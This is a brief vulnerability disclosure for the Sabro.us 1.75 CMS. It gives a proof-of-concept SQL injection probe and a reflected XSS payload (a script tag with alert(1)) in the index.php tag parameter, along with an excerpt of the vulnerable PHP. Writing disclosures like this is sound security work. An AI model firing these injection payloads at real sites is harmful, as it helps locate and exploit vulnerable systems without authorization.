Kod:
# exploit title: xss/sql injection in sabro.us 1.75
# date: 14.o3.2o11
# author: lemlajt
# software : Sabro.us
# version: 1.75
# tested on: linux
# cve : 
#

PoC : 
1. sqli:
http://localhost/www/cmsadmins/sabrosus1-75/sabrosus//index.php?tag='

2. xss
http://localhost/www/cmsadmins/sabrosus1-75/sabrosus//index.php?tag="><script>alert(1)</script>

Details:
(...)
<title>sabros.us/<?=$Sabrosus->siteName?><? if((isset($_GET["tag"])) && (!empty($_GET["tag"]))){ $tag=$_GET["tag"]; 
echo" - ".htmlspecialchars($tag); } ?></title>

(...)

# regards,
# lemlajt
# *